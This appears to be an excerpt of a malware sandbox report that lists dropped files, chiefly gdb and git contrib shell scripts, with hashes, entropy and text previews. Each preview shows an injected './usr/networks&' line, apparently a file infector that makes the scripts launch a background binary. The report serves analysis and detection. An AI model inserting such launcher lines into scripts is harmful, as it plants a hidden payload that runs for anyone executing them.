                                                                                                                        Preview: ./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/gdb/contrib/gdb-add-index.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1048
                                                                                                                        Entropy (8bit):4.806462537404251
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:yJI5VNyJmc20JsvodjbGCHiVwZvFfg0udaATYdITFvVg47VZ0ou:II63pJftBudaqYmTFmJ
                                                                                                                        MD5:5864556D6334995F87B9236F2BDDAE2F
                                                                                                                        SHA1:65C2E90583C5B2DF8050063559E7FA2885F7427F
                                                                                                                        SHA-256:4BBE42BA86B2EBBC463E505A6D3551775BB4E2ED64BDA2C8F1E7B50B9F4C99C3
                                                                                                                        SHA-512:0E99B5F846FE6295B4ACFF8030BCBE895D1BCCCDF7B0098E8DABF8ADC50E56CA8A38A549B5A052C86FF9DA9B0A2C7BFBAD7CE939F373AB78F525FEEF2065D615
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir=".".index="${file}.gdb-index"..rm -f $index.# Ensure intermediate index file is removed when we exit..trap "rm -f $index" 0..$GDB --batch -nx -iex 'set auto-load no' \. -ex "file $file" -ex "save gdb-index $dir" || {. # Just in case.. status=$?. echo "$myname: gdb error generating index for $file" 1>&2. exit $status.}..# In some situations gdb can exit without creating an index. This is.# not an error..# E.g., if $file is stripped. This behaviour is akin to stripping an.# already stripped binary, it's a no-op..status=0..if test -f "$index"; then. $OBJCOPY --add-section .gdb_index="$index" \..--set-section-flags .gdb_index=readonly "$file" "$file". status=$?.else. echo "$myname: No index was created for $file" 1>&2. echo "$myname: [Was there no debuginfo? Was there already an index?
                                                                                                                        /usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/git/contrib/examples/git-am.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:OS/2 REXX batch file, ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):21942
                                                                                                                        Entropy (8bit):5.106661772210516
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:6REUag9f8Ydg0VeV9KziwsORFRByXlU1m4csVIw17OqlDfRRdxyZymevMNcPh/Rl:6Rhb9fJd1Vmkziw9RFRByX8D7Vd7Oqlh
                                                                                                                        MD5:16E6ACE0E85A54EA4C061BDA1D3BF70D
                                                                                                                        SHA1:B2569F727A9B61E0583574CC0793647136F76E32
                                                                                                                        SHA-256:B56C64E30B028ACB3523D99266AD8931417240B883EC8961ED24F4004D6EA1C9
                                                                                                                        SHA-512:F730D5171A9533A87455BEA4133439096E9A53C4783FAD29DA3DFDB9BBCD2F05DDF9EBBEBB94CF21AC4138833AB83B9AEF94612D5538671F29B726F147749322
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. exit 1.}..safe_to_abort () {..if test -f "$dotest/dirtyindex"..then...return 1..fi...if ! test -f "$dotest/abort-safety"..then...return 0..fi...abort_safety=$(cat "$dotest/abort-safety")..if test "z$(git rev-parse --verify -q HEAD)" = "z$abort_safety"..then...return 0..fi..gettextln "You seem to have moved HEAD since the last 'am' failure..Not rewinding to ORIG_HEAD" >&2..return 1.}..stop_here_user_resolve () {. if [ -n "$resolvemsg" ]; then.. printf '%s\n' "$resolvemsg".. stop_here $1. fi. eval_gettextln "When you have resolved this problem, run \"\$cmdline --continue\"..If you prefer to skip this patch, run \"\$cmdline --skip\" instead..To restore the original branch and stop patching, run \"\$cmdline --abort\".".. stop_here $1.}..go_next () {..rm -f "$dotest/$msgnum" "$dotest/msg" "$dotest/msg-clean" \..."$dotest/patch" "$dotest/info"..echo "$next" >"$dotest/next"..this=$next.}..cannot_fallback () {..echo "$1"..gettextln "Cannot fall back to thr
                                                                                                                        /usr/share/doc/git/contrib/examples/git-checkout.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4825
                                                                                                                        Entropy (8bit):5.113528532566079
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:dFHSEVt3CuAqnOGD5OKNPLT85zoEl5kJbDF772+u/NvZKJhGY44FVT0HAqFt3e:LTVUCDgKNDT8CB72hxChZ40KfQ
                                                                                                                        MD5:595AE545C31B21B58D1C77B533F7A2D4
                                                                                                                        SHA1:86F2DA045AA3718950585397A21D5387682A3548
                                                                                                                        SHA-256:9DACE4B4205D10F2705B32DC8963F132E51FC1D9DF799AE543EC6BE6115FA2B0
                                                                                                                        SHA-512:A8799023F5550B631064E93EFF1E4786A2362AB3B409D143800CE408BD150CECD74AD3266B32E8CBF7B0A007E352F3F4DA3D1EB7D216DA26413E718E2DCFC09C
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&...git update-index --index-info || exit $?..fi...# Make sure the request is about existing paths...git ls-files --full-name --error-unmatch -- "$@" >/dev/null || exit..git ls-files --full-name -- "$@" |...(cd_to_toplevel && git checkout-index -f -u --stdin)...# Run a post-checkout hook -- the HEAD does not change so the..# current HEAD is passed in for both args..if test -x "$GIT_DIR"/hooks/post-checkout; then.. "$GIT_DIR"/hooks/post-checkout $old $old 0..fi...exit $?.else..# Make sure we did not fall back on $arg^{tree} codepath..# since we are not checking out from an arbitrary tree-ish,..# but switching branches...if test '' != "$new"..then...git rev-parse --verify "$new^{commit}" >/dev/null 2>&1 ||...die "Cannot switch branch to a non-commit."..fi.fi..# We are switching branches and checking out trees, so.# we *NEED* to be at the toplevel..cd_to_toplevel..[ -z "$new" ] && new=$old && new_name="$old_name"..# If we don't have an existing branch that we're switching
                                                                                                                        /usr/share/doc/git/contrib/examples/git-clean.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/git/contrib/examples/git-clone.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11759
                                                                                                                        Entropy (8bit):5.2205279036587235
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:9M6sMKXA+aN0VYXNXYdcYZRoT+7rdVAqmdOIhH+Cqd1WPnaetMkTri0i55rIIq4G:SMxpY6YZRoTeJHf4H+CqdPAM8+p86TvK
                                                                                                                        MD5:1E0926F456D9D5C35DF266EF276212C6
                                                                                                                        SHA1:4C741DD9AD5F798BDCE0F67172F2B790FFF1B6BD
                                                                                                                        SHA-256:C1DA77F45A430BC683EF4C9DDAA2AFB3B8F3D6F75A6B0406C456DFF3B4637BBC
                                                                                                                        SHA-512:30A51026697132EA1F83C1D5BCF796C17AB7EC418352FF268BD1461397F9A2280E5752FC673ACE99F606B6E136E0F2A85FFF2F0BF8D12AE0A35C8D95C5A7A478
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..exit 1.}..usage() {..exec "$0" -h.}..eval "$(echo "$OPTIONS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..get_repo_base() {..(...cd "$(/bin/pwd)" &&...cd "$1" || cd "$1.git" &&...{....cd .git....pwd...}..) 2>/dev/null.}..if [ -n "$GIT_SSL_NO_VERIFY" -o \.."$(git config --bool http.sslVerify)" = false ]; then. curl_extra_args="-k".fi..http_fetch () {..# $1 = Remote, $2 = Local..curl -nsfL $curl_extra_args "$1" >"$2"..curl_exit_status=$?..case $curl_exit_status in..126|127) exit ;;..*). return $curl_exit_status ;;..esac.}..clone_dumb_http () {..# $1 - remote, $2 - local..cd "$2" &&..clone_tmp="$GIT_DIR/clone-tmp" &&..mkdir -p "$clone_tmp" || exit 1..if [ -n "$GIT_CURL_FTP_NO_EPSV" -o \..."$(git config --bool http.noEPSV)" = true ]; then...curl_extra_args="${curl_extra_args} --disable-epsv"..fi..http_fetch "$1/info/refs" "$clone_tmp/refs" ||...die "Cannot get remote repository information..Perhaps git-update-server-info needs to be run there?"..test "z$qu
                                                                                                                        /usr/share/doc/git/contrib/examples/git-commit.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):13843
                                                                                                                        Entropy (8bit):5.402105827507175
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:ohf3saLCKohntpFFLWt8CKHNFQCglPySY2rOsMi/URiCNW8msLDkV+HZqIgCu:ohf3ThWnnFFLWqCKtFz1SY2rOstURiCK
                                                                                                                        MD5:801864707ABB06C3ACD5E9AA7EF0A231
                                                                                                                        SHA1:1492CCEEA7F7892507958970BD7012850E3D8498
                                                                                                                        SHA-256:C4945D20EEF27CDF5E23450FF797808F6F58C8973B9ED415B7E391B24D3D895C
                                                                                                                        SHA-512:ABD01060290B46E9F538D6E9E88F4F9FDCDFECF7715DE0CB860CCF053899453BDC701F82AD16BA12DB3B688DAF9B0429D4FBC5F6EEB1F4621CF68BA8868D733A
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..exit 1.}..TMP_INDEX=.THIS_INDEX="${GIT_INDEX_FILE:-$GIT_DIR/index}".NEXT_INDEX="$GIT_DIR/next-index$$".rm -f "$NEXT_INDEX".save_index () {..cp -p "$THIS_INDEX" "$NEXT_INDEX".}..run_status () {..# If TMP_INDEX is defined, that means we are doing..# "--only" partial commit, and that index file is used..# to build the tree for the commit. Otherwise, if..# NEXT_INDEX exists, that is the index file used to..# make the commit. Otherwise we are using as-is commit..# so the regular index file is what we use to compare...if test '' != "$TMP_INDEX"..then...GIT_INDEX_FILE="$TMP_INDEX"...export GIT_INDEX_FILE..elif test -f "$NEXT_INDEX"..then...GIT_INDEX_FILE="$NEXT_INDEX"...export GIT_INDEX_FILE..fi...if test "$status_only" = "t" || test "$use_status_color" = "t"; then...color=..else...color=--nocolor..fi..git runstatus ${color} \...${verbose:+--verbose} \...${amend:+--amend} \...${untracked_files:+--untracked}.}..trap '..test -z "$TMP_INDEX" || {...test -f "$TMP_INDEX" && rm -
                                                                                                                        /usr/share/doc/git/contrib/examples/git-fetch.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):5954
                                                                                                                        Entropy (8bit):5.053117199381536
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:qjiwPNH32mZrlw8DpKg1ol8p2vgW7Tle8yibXzcDUyUuf1s7pbEVALomiS7yDRNL:qjrPNH32mZrlw8Dz1ol8p2YW/le8yib0
                                                                                                                        MD5:660949C6D769C055433FA32AD8CF7CB7
                                                                                                                        SHA1:D32B9EB0B032620ABDD884C3F205135F48A5CCAA
                                                                                                                        SHA-256:8D505E7404190C524B25A82E6D935752034AC993B74C2B704B93A8F69BA56FF5
                                                                                                                        SHA-512:65C50E1465E3D47F5703D87D9B6EB54CE63670D94A47C4341F42FBAB3566A3EE27159C968D55ACE8A2B4F8E7AC0B3E30BBA3BC42E24FAA92BFA5DAFAEC8ECA94
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&... done` || exit..if test "$#" -gt 1..then...# remote URL plus explicit refspecs; we need to merge them....reflist="$reflist$LF$taglist"..else...# No explicit refspecs; fetch tags only....reflist=$taglist..fi.fi..fetch_all_at_once () {.. eval=$(echo "$1" | git fetch--tool parse-reflist "-"). eval "$eval".. ( : subshell because we muck with IFS. IFS=" .$LF". (..if test "$remote" = . ; then.. git show-ref $rref || echo failed "$remote"..elif test -f "$remote" ; then.. test -n "$shallow_depth" &&...die "shallow clone with bundle is not supported".. git bundle unbundle "$remote" $rref ||.. echo failed "$remote"..else...if.test -d "$remote" &&.....# The remote might be our alternate. With....# this optimization we will bypass fetch-pack....# altogether, which means we cannot be doing....# the shallow stuff at all.....test ! -f "$GIT_DIR/shallow" &&....test -z "$shallow_depth" &&.....# See if all of what we are going to fetch are....# connected to
                                                                                                                        /usr/share/doc/git/contrib/examples/git-gc.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):61
                                                                                                                        Entropy (8bit):4.0161977906092705
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVMQyXJ/F3LQVOORgn:L/lPn
                                                                                                                        MD5:3A0813DB0108F078C610EB236C574A2F
                                                                                                                        SHA1:A7D47F14D8FD35FD8BF6799063B3EB4E9DCC610A
                                                                                                                        SHA-256:36BC6583258DCBB387D7AFFE086BC744F13B329E55E2F9657C385F6BC24AF215
                                                                                                                        SHA-512:69C3A007D44A13ED9D3F9F4F5C545C9B3A541FE500DDFA2E2934706CB1A740AD61AC75F8F47572DA78F4CD49D65DAEAF6118B4E3FA0C8A182F8FA78FC52C7F82
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.git rerere gc || exit../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/git/contrib/examples/git-log.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):234
                                                                                                                        Entropy (8bit):4.9965164312586925
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:MebhIYlCNdR39BOAvvmmJ9aKI9tIYl0R39BOFon:MKhyN46vBFeQN4yn
                                                                                                                        MD5:0A7B48976D929CEFAB720CC9C3F6EECF
                                                                                                                        SHA1:EF27B3E70278C3563C0BDD27DD6836D902DC1A5F
                                                                                                                        SHA-256:1A6D192431FBD9F6E4701981F8E954FD19B2D0265F594FE4EF2F1B82CE2CA78D
                                                                                                                        SHA-512:A5AE18EFBE0ED252032E372ACD45229CE6FC5D40D83C89291CA560997F7AD557D9CBE00C684DE2877B6CCC3C505A2089A9FEA372B3A5CA1B06FF2DA0553C5B4D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.revs=$(git-rev-parse --revs-only --no-flags --default HEAD "$@") || exit.[ "$revs" ] || {..die "No HEAD ref".}.git-rev-list --pretty $(git-rev-parse --default HEAD "$@") |.LESS=-S ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/git/contrib/examples/git-ls-remote.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2436
                                                                                                                        Entropy (8bit):5.153713997451705
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:9zJ+UQnIYLiLPX0zZhf1VpVZVpvPWg7WSfszrr9nQ8uMhpV24:Rp8Q09h9fDfh7f0zrr9Jv
                                                                                                                        MD5:AF55A4CB380CF0ECC6B02D4B7E057F05
                                                                                                                        SHA1:0B94808900C3D78664D23049C7A002292DF682DB
                                                                                                                        SHA-256:9CCAED1BB101426884242DF53C0CA66E5BF7CC181E56817A9E07190268ECE44D
                                                                                                                        SHA-512:5E193F8738198024CCCA155F4D141AA519A12AEA9FF4592D1A419B0EBAA1F30D4BCF297F0DDEA56281EEAE2CAD02ACFD6DC2CA6192465ABBCD2EB813909B911A
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. exit 1;.}..die () {. echo >&2 "$*". exit 1.}..exec=.while test $# != 0.do. case "$1" in. -h|--h|--he|--hea|--head|--heads). heads=heads; shift ;;. -t|--t|--ta|--tag|--tags). tags=tags; shift ;;. -u|--u|--up|--upl|--uploa|--upload|--upload-|--upload-p|--upload-pa|\. --upload-pac|--upload-pack)..shift..exec="--upload-pack=$1"..shift;;. -u=*|--u=*|--up=*|--upl=*|--uplo=*|--uploa=*|--upload=*|\. --upload-=*|--upload-p=*|--upload-pa=*|--upload-pac=*|--upload-pack=*)..exec=--upload-pack=$(expr "z$1" : 'z-[^=]*=\(.*\)')..shift;;. --). shift; break ;;. -*). usage ;;. *). break ;;. esac.done..case "$#" in 0) usage ;; esac..case ",$heads,$tags," in.,,,) heads=heads tags=tags other=other ;;.esac... git-parse-remote.peek_repo="$(get_remote_url "$@")".shift..tmp=.ls-remote-$$.trap "rm -fr $tmp-*" 0 1 2 3 15.tmpdir=$tmp-d..case "$peek_repo" in.http://* | https://* | ftp://* )..if [ -n "$GIT_SSL_NO_VERIFY" -o \..."$(git config --bool http.sslVerify)" = false
                                                                                                                        /usr/share/doc/git/contrib/examples/git-merge-ours.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):247
                                                                                                                        Entropy (8bit):4.532049748049262
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:p5zAueMvudOATN8RXj040SryRqnsAHPiE/TA6K4n:paueMvSOsN8i4vORqsAHPn/TA6K4n
                                                                                                                        MD5:6B5C49DDB3925AD806E66DDA92D4E418
                                                                                                                        SHA1:39D261BAF8946100647BEA3B3A880E9F02D88856
                                                                                                                        SHA-256:7F280747A1078055FB5263854D39FDF589B66D9123F0BFBDCA8420E20E74CCEC
                                                                                                                        SHA-512:6C5FA59F21AA84EFB6EF5417CC19CC9B222857225E129D3CE5907A3B9FED2D389CB31FA40890BD08C5EF93A1044C2F0225639DC30BAC5A6921171FD30D3BD710
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.# We need to exit with 2 if the index does not match our HEAD tree,.# because the current index is what we will be committing as the.# merge result...git diff-index --quiet --cached HEAD -- || exit 2..exit 0../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/git/contrib/examples/git-merge.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12742
                                                                                                                        Entropy (8bit):5.053935136942481
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:RZqDktd3tRumXQN7vYT2kFjlW6vZXgq8FL6F2Wz17Le3YHNJ0ztQrp2LdHPbZ/Z+:RZmYd3tRumXQNzkFjlW6Vgq8FeFp17CK
                                                                                                                        MD5:2A8A8A129B42665461A116FCB6D89D8B
                                                                                                                        SHA1:A9CBE3681D2F91BBA4E8D498A0F7479FDA479B3A
                                                                                                                        SHA-256:F62B6129B085DEC827A5A45298E0DCFA9D3FACCBD77C487BBE085D32D3A5F6C1
                                                                                                                        SHA-512:A3B33D5810AF30524F6A7528C9D1B5EEA2D52C28C2B945795F887F131477124698C03173F373B2315BB8593597072A85E234D6E00EEDA5233B62A0C89ACAAE66
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&... "$GIT_DIR/MERGE_STASH" "$GIT_DIR/MERGE_MODE" || exit 1.}..savestate() {..# Stash away any local modifications...git stash create >"$GIT_DIR/MERGE_STASH".}..restorestate() {. if test -f "$GIT_DIR/MERGE_STASH"..then...git reset --hard $head >/dev/null...git stash apply $(cat "$GIT_DIR/MERGE_STASH")...git update-index --refresh >/dev/null..fi.}..finish_up_to_date () {..case "$squash" in..t)...echo "$1 (nothing to squash)" ;;..'')...echo "$1" ;;..esac..dropsave.}..squash_message () {..echo Squashed commit of the following:..echo..git log --no-merges --pretty=medium ^"$head" $remoteheads.}..finish () {..if test '' = "$2"..then...rlogm="$GIT_REFLOG_ACTION"..else...echo "$2"...rlogm="$GIT_REFLOG_ACTION: $2"..fi..case "$squash" in..t)...echo "Squash commit -- not updating HEAD"...squash_message >"$GIT_DIR/SQUASH_MSG"...;;..'')...case "$merge_msg" in...'')....echo "No merge message -- not updating HEAD"....;;...*)....git update-ref -m "$rlogm" HEAD "$1" "$head" || exit
                                                                                                                        /usr/share/doc/git/contrib/examples/git-notes.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/git/contrib/examples/git-pull.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4349
                                                                                                                        Entropy (8bit):4.9994650554848405
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:lB+CYcJmdl/TcE+v9+AggZXlRmfOQIJsbgSlz8LghIjMbefNB++c5xvANzm4GrH:XnYcQ9Anv0gXlRmy0leosTqxvANi4GrH
                                                                                                                        MD5:B39052D7DD650B5F80BCEF97A6F7058C
                                                                                                                        SHA1:EF47310F65C7239C67AFE91B0F76E78DC90D9AE8
                                                                                                                        SHA-256:46146F3FC719B41C9D31F192AA0611E3975884C720786394AD745B13227FCE74
                                                                                                                        SHA-512:46C39598206F81581740AB41E66B406FA7131511988713B38589069D1AB07F422189B1CA3999828E850ECAF345E93F6513947E44146334231E46DCCBF81D281F
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..exit 1..;;.esac..error_on_no_merge_candidates () {..exec >&2...if test true = "$rebase"..then...op_type=rebase...op_prep=against..else...op_type=merge...op_prep=with..fi...upstream=$(git config "branch.$curr_branch_short.merge")..remote=$(git config "branch.$curr_branch_short.remote")...if [ $# -gt 1 ]; then...if [ "$rebase" = true ]; then....printf "There is no candidate for rebasing against "...else....printf "There are no candidates for merging "...fi...echo "among the refs that you just fetched."...echo "Generally this means that you provided a wildcard refspec which had no"...echo "matches on the remote end."..elif [ $# -gt 0 ] && [ "$1" != "$remote" ]; then...echo "You asked to pull from the remote '$1', but did not specify"...echo "a branch. Because this is not the default configured remote"...echo "for your current branch, you must specify a branch on the command line."..elif [ -z "$curr_branch" -o -z "$upstream" ]; then.... git-parse-remote...error_on_missing_
                                                                                                                        /usr/share/doc/git/contrib/examples/git-repack.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2499
                                                                                                                        Entropy (8bit):5.168731776130111
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:gk8qWttthEvMBOv3h1Guyv97zFidlMli854KKOFjYIQM7C:gftttU0OP5Ezg4KO6IHu
                                                                                                                        MD5:6F9B4B96D854B71A3ABE079E040047D6
                                                                                                                        SHA1:C7AD001A3705F0E5004BA1B0F8DC4FFD995489D6
                                                                                                                        SHA-256:AC617B99EA453E02C13EEDFFC136E484E9AEE3ADAE6E4EE0D8BA6F2BB2E9E57A
                                                                                                                        SHA-512:5C229085CC34D3CFF2E0DDBE1C312DBDEE3D950D5B14E0B80408D849BE12DA39051E7136FC7D4C9F1E2135C0C4EB37CB2D507BC0DAB4FCB20FD6B0568C0CF15A
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.mkdir -p "$PACKDIR" || exit..args="$args $local ${GIT_QUIET:+-q} $no_reuse$extra".names=$(git pack-objects --keep-true-parents --honor-pack-keep --non-empty --all --reflog $args </dev/null "$PACKTMP") ||..exit 1.if [ -z "$names" ]; then..say Nothing new to pack..fi..# Ok we have prepared all new packfiles...# First see if there are packs of the same name and if so.# if we can move them out of the way (this can happen if we.# repacked immediately after packing fully..rollback=.failed=.for name in $names.do..for sfx in pack idx..do...file=pack-$name.$sfx...test -f "$PACKDIR/$file" || continue...rm -f "$PACKDIR/old-$file" &&...mv "$PACKDIR/$file" "$PACKDIR/old-$file" || {....failed=t....break...}...rollback="$rollback $file"..done..test -z "$failed" || break.done..# If renaming failed for any of them, roll the ones we have.# already renamed back to their original names..if test -n "$failed".then..rollback_failure=..for file in $rollback..do...mv "$PACKDIR/old-$file" "$PACK
                                                                                                                        /usr/share/doc/git/contrib/examples/git-reset.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1947
                                                                                                                        Entropy (8bit):5.193786239756587
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:EKf4340DBCBBT0M28AHb/XPNV3avMZDUWaUBMh/:M34iAXDAHb/VVqvL+aB
                                                                                                                        MD5:F1EDF5EE98492845561257661376A072
                                                                                                                        SHA1:67AFEDE1A2AA714F28059BDF693240E3333CA299
                                                                                                                        SHA-256:D3E33026EC306D7E2DAC973B7F75227D42F7CE4F693C15AC2686CDE47CD94EFE
                                                                                                                        SHA-512:754A315184ABACBA1171CC3C152C68C158C76BFF695CDD4ED283E278398AAD8A9C8EBC48E276D879121614DD8589F306674B433281DCBC165062C03C67C2DE51
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&...rev=$(git rev-parse --verify "$1") || exit...shift...break...;;..esac..shift.done..: ${rev=HEAD}.rev=$(git rev-parse --verify $rev^0) || exit..# Skip -- in "git reset HEAD -- foo" and "git reset -- foo"..case "$1" in --) shift ;; esac..# git reset --mixed tree [--] paths... can be used to.# load chosen paths from the tree into the index without.# affecting the working tree or HEAD..if test $# != 0.then..test "$reset_type" = "--mixed" ||...die "Cannot do partial $reset_type reset."...git diff-index --cached $rev -- "$@" |..sed -e 's/^:\([0-7][0-7]*\) [0-7][0-7]* \([0-9a-f][0-9a-f]*\) [0-9a-f][0-9a-f]* [A-Z].\(.*\)$/\1 \2.\3/' |..git update-index --add --remove --index-info || exit..git update-index --refresh..exit.fi..cd_to_toplevel..if test "$reset_type" = "--hard".then..update=-u.fi..# Soft reset does not touch the index file or the working tree.# at all, but requires them in a good order. Other resets reset.# the index file to the tree object we are switching to..i
                                                                                                                        /usr/share/doc/git/contrib/examples/git-resolve.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2433
                                                                                                                        Entropy (8bit):5.07831529192731
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:U3/EzFjkVK7XZvFjMaUHjkwIZjJE0wzFqEBCs5eAK6GKQ6KqKJ6:UcBkwjTCkzZjW0wzFqENZGEzv
                                                                                                                        MD5:71B42464943116BC0925788790C82720
                                                                                                                        SHA1:2158A9166F101D7C06DCE90490CA72FC701F7AC8
                                                                                                                        SHA-256:41E20007FBC984AAA2A69BC91D8A469DF54462BBBD82F41A088BD1B1C4D7236D
                                                                                                                        SHA-512:EDA4CB63C15356D00C46117CF692BD985EC13918E71ACBA5DE48AF0E7EB85CFF35BCE5F47A3731EBDB99A75748F6C5C46F799F480C72E229CCDBCB24161571F4
                                                                                                                        Malicious:false
